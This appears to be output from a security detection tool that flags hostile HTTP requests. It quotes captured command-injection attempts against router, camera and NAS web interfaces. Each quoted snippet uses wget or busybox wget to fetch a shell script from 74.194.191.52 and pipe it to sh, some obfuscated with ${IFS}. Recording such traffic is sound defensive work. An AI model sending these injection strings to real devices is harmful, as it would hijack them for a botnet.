Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20wget%20-qO-%20'
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20wget%20-qO-%20'
Pipe/redirect operators in a context that resembles command execution. Snippet='tup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox wget -qO- http://74.194.191.52/rondo.fep.sh|sh
&test=11currents'
Pipe/redirect operators in a context that resembles command execution. Snippet='tup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox wget -qO- http://74.194.191.52/rondo.fep.sh|sh
&test=11currents'
Pipe/redirect operators in a context that resembles command execution. Snippet='rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox wget -qO- http://74.194.191.52/rondo.ebj.sh|sh&echo -'
Pipe/redirect operators in a context that resembles command execution. Snippet='rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox wget -qO- http://74.194.191.52/rondo.ebj.sh|sh&echo -'
Pipe/redirect operators in a context that resembles command execution. Snippet='GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${I'
Pipe/redirect operators in a context that resembles command execution. Snippet='GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${I'
Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${I'
Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${I'
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.19'
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.19'
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-'
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-'
Pipe/redirect operators in a context that resembles command execution. Snippet='iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=`busybox wget -qO- http://74.194.191.52/rondo.eby.sh|sh` -'
Pipe/redirect operators in a context that resembles command execution. Snippet='iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=`busybox wget -qO- http://74.194.191.52/rondo.eby.sh|sh` -'
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.u'
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.u'
Pipe/redirect operators in a context that resembles command execution. Snippet='ET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox wget -qO- http://74.194.191.52/rondo.ush.sh|sh&&curpath=/¤'
Pipe/redirect operators in a context that resembles command execution. Snippet='ET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox wget -qO- http://74.194.191.52/rondo.ush.sh|sh&&curpath=/¤'